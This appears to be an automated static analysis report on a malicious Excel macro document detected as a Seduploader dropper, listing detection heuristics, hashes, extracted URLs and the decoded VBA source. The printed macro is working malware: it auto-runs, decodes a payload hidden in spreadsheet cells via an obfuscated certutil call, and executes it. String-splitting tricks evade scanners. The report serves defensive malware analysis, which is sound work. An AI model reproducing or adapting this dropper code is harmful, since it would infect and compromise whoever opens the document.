Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cb85072e6ca66a29…

MALICIOUS

Office (OLE)

Size: 233.0 KB | Created: 2018-01-31 13:37:40 | Authoring application: Microsoft Excel | First seen: 2020-12-25
MD5: 56f98e3ed00e48ff9cb89dea5f6e11c1 | SHA-1: b06930c9809ab5e4cb6659089ac6fcec470c9c16 | SHA-256: cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7
Risk Score: 390

Heuristics (10)

  • ClamAV: Doc.Dropper.Seduploader-6784277-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Seduploader-6784277-0
  • Malformed OLE auto-open stager with embedded ZIP payload critical OLE_RAW_MALFORMED_AUTOOPEN_STAGER
    Raw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
        Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
        Sub Auto_Open()
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x41 (A) bytes found
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 100% of instructions — a sled or padding/filler run, not program logic).
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.maritime-recon.com/janes  In document text (OLE body)
    • http://www.mobiledeployable.com/janes  In document text (OLE body)
    • http://www.globalsofsymposium.org/us#1  In document text (OLE body)
    • http://www.maritime-recon.com/janes (followed by an undecodable byte)  In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2577 bytes
SHA-256: 65c3fe528293239f417e1129f19c1fe126b3214a35d389c66ca3477a3738222e
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Auto_Open()
    ActiveSheet.Range("a1:c54").Font.Color = vbBlack
    Call LinesOfBusiness.TQuH8wDO

    
End Sub


Attribute VB_Name = "LinesOfBusiness"

#If VBA7 Then
    Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
#Else
    Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If


Function GetVal(sr As Long, er As Long, c As Long)
    Dim x
    For i = sr To er
        x = x + Cells(i, c)
    Next
    GetVal = x
End Function


Function GetRand()
    Dim r As String
    Dim i As Integer
     
    Randomize
    For i = 1 To 8
        If i Mod 2 = 0 Then
            r = Chr(Int((90 - 65 + 1) * Rnd + 65)) & r
        Else
            r = Int((9 * Rnd) + 1) & r
        End If
    Next i
    GetRand = r
End Function


Sub cutil(code As String)
    Dim x As String
    
    x = "-----BEG" & "IN CER" & "TIFICATE-----"
    x = "-----BEG" & "IN CER" & "TIFI" & "CATE-----"
    x = x + vbNewLine
    x = x + code
    x = x + vbNewLine
    x = x + "-----E" & "ND CERTIF" & "ICATE-----"
    
    Dim path As String
    path = "C:\Programdata\" & rndname & ".txt"
    expath = "C:\Programdata\" & rndname & ".exe"
    
    Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")
    path = "C:\Programdata\" & GetRand & ".txt"
    expath = "C:\Programdata\" & GetRand & ".exe"
    
    Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemOb" & "ject")
    Set file = scr.CreateTextFile(path, True)
    file.Write x
    file.Close

    Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _
    Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)
    Sleep 2000
    Shell (expath)
End Sub


Sub TQuH8wDO()
    Dim p As String
    p = GetVal(2227, 2248, 170)
    cutil (p)
End Sub